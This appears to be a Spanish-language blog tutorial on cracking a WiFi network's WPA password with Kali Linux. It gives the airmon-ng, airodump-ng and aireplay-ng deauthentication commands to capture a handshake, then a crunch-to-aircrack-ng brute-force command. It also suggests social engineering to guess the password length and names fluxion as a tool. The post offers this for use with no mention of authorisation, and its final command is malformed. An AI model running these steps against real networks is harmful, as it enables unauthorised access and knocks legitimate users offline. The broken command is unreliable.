HACER FUERZA BRUTA WIFI USANDO CRUNCH EN KALI LINUX

Hola? Antes de empezar quiero agradecer mucho a todas las personas que compartieron mi post anterior. Hoy vamos aprender lo que muchas personas me han preguntado en mi vida. Cread comparte tu diccionario o muéstranos un método para hacer ataque sobre eso hacia la red. Primero quiero aclarar que puede funcionar según tu diccionario y combinación de comandos. También quiero agradecer a mi amigo ruso por haberme hecho telepatía.

Me preguntarán cual seria la cantidad necesitaría para un buen diccionario.

Te responderé siempre habrá un humano que cometa un error y deje contraseña por default solo tienes que tu hacer ingeniería social para informarte la cantidad  que necesitas para hacer tu diccionario.
Ejemplo:
Mi contraseña por default tiene 6 y 8 dígitos.

Me imagino que ya a estas altura son unos máster con los comandos para hacer ataques de redes.

PROCEDIMIENTO PARA ATAQUE:

airmon-ng
airmon-ng check kill wlan0
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c [channel id] --write CreadPag --bssid
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0

Tienes más duda? Visita mi anterior post.
Ahora con este comando puedes hacer tu fuerza bruta.

 crunch 6 8 a14 | aircrack-ng -w '/root/CreadPag.01.cap' (Tu Handshake) -e CreadPag (Nombre de tu red o BSSID)

Recuerda que primero tienes que correr los comando de crunch para hacer fuerza bruta.
Tienes más duda de crunch?aqui
Tienes problemas en capturar los handshake usa fluxion que te hará más sencillo.
Espero haberte ayudado. Y no te olvides en compartirlo. Estaré un poco desaparecido porque tengo que presentar algo en un lugar favorito. Muchas gracias por entender. Compártelo.